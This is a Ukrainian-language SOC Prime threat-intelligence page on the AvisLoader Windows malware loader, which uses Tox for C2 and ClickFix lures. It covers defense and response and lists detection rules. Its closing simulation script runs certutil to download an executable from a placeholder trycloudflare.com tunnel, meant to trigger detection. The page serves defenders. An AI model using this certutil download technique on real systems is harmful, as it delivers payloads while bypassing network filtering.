SOC Prime Bias: High

25 Sep 2026 08:27 UTC

AvisLoader: новий стійкий завантажувач шкідливих програм для Windows

Author Photo
SOC Prime Team linkedin icon Стежити
AvisLoader: новий стійкий завантажувач шкідливих програм для Windows
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

AvisLoader – це нещодавно виявлений завантажувач шкідливого програмного забезпечення для Windows, який використовує мережу обміну повідомленнями Tox для командно-контрольної (C2) комунікації. Такий децентралізований підхід дозволяє операторам підтримувати підключення і переміщувати контролери без залежності від фіксованих доменів або централізованих серверів. Шкідливе програмне забезпечення зазвичай поширюється через соціальні інженерні приманки ClickFix, розміщені на інфраструктурі Cloudflare.

Розслідування

Varonis Threat Labs виявила завантажувач на відкритому сервері підготовки разом з його командним центром і пов’язаними інструментами. Розслідування виявило приманку ClickFix з темою DocuSign, яка інструктує користувачів виконувати команди, що отримують навантаження через Cloudflare Quick Tunnels. Аналіз виконуваного файлу виявив C2-комунікації на основі Tox, функціональність обходу UAC і модулі, призначені для приховування шкідливих процесів.

Захист

Організації повинні навчати користувачів розпізнавати та повідомляти про запити на підписування документів, які просять їх вставити команди в термінали або діалогове вікно Windows Run. Команди безпеки повинні стежити за підозрілим використанням Cloudflare Workers і Quick Tunnels в веб-приманках. Виявлення несподіваного трафіку peer-to-peer (P2P) мережі та несанкціонованих змін ярликів робочого столу також може допомогти знизити ризик.

Відповідь

Коли виявляється активність AvisLoader, команди безпеки повинні переглянути процес ланцюговості командних оболонок і інтерпретаторів сценаріїв, запущених після відвідування підозрілих доменів. Перевірте кінцеві точки на наявність змінених ярликів, .backup файли, і артефакт VLCAssistant . Телеметрія мережі також повинна бути перевірена на наявність незвичайного трафіку протоколу Tox, що походить з уражених хостів.

Атака

Ми ще оновлюємо цю частину.

Виявлення

Підозрілий виконуваний файл, що містить лише числа в назві (via cmdline)

Команда SOC Prime
24 вересня 2026

Підозрілий зв’язок з доменом Trycloudflare (via dns)

Команда SOC Prime
24 вересня 2026

Підозріла спроба виконання Curl [MacOS] (via cmdline)

Команда SOC Prime
24 вересня 2026

IOCs (HashSha256) для виявлення: Знайомтеся з AvisLoader: завантажувач Windows, націлений на тривалу роботу після ліквідації

Правила AI команди SOC Prime
24 вересня 2026

Виявлення несподіваного трафіку Tox або peer-to-peer [Windows Network Connection]

Правила AI команди SOC Prime
24 вересня 2026

Виявлення віддаленого виконання коду за допомогою командних оболонок і Cloudflare Quick Tunnel [Windows Process Creation]

Правила AI команди SOC Prime
24 вересня 2026

Виконання симуляції

  • Сценарій атаки та команди: Противник отримав первинний доступ до робочої станції. Щоб зберегти стійкість і завантажити їхній другий модульний вантаж, вони використовують Cloudflare Quick Tunnel, щоб обійти фільтрацію вихідного трафіку. Зловмисник використовує certutil.exe, вбудовану утиліту Windows, щоб завантажити навантаження з https://malicious-tunnel-id.trycloudflare.com/payload.exe. Цей метод вибрано, оскільки certutil є довіреним бінарним файлом, а трафік, здається, спрямований на легітимну інфраструктуру Cloudflare, що зменшує ймовірність його відхилення базовими фільтрами репутації мережі.

  • Скрипт регресійного тестування:

    # Скрипт симуляції для виклику правила виявлення.
    # Це використовує certutil для спроби завантаження із адреси trycloudflare.com.
    
    $targetUrl = "https://fake-tunnel-id-1234.trycloudflare.com/malware.exe"
    Write-Host "[*] Симуляція активності супротивника: Завантаження з $targetUrl через certutil..."
    
    # Наступна команда розроблена для виклику умов "selection_tunnel" І "selection_tools".
    certutil.exe -urlcache -split -f "$targetUrl" "$env:TEMPmalware.exe"
    
    if ($LASTEXITCODE -eq 0) {
        Write-Host "[+] Команда симуляції виконана успішно."
    } else {
        Write-Host "[-] Команда не вдалася (очікувано, якщо URL не існує, але телеметрія все ще повинна генеруватися)."
    }
  • Команди очищення:

    # Скрипт очищення для видалення симульованого навантаження та локальних артефактів.
    $tempFile = "$env:TEMPmalware.exe"
    if (Test-Path $tempFile) {
        Remove-Item -Path $tempFile -Force
        Write-Host "[+] Очищено $tempFile"
    } else {
        Write-Host "[-] Жодного артефакту не знайдено для очищення."
    }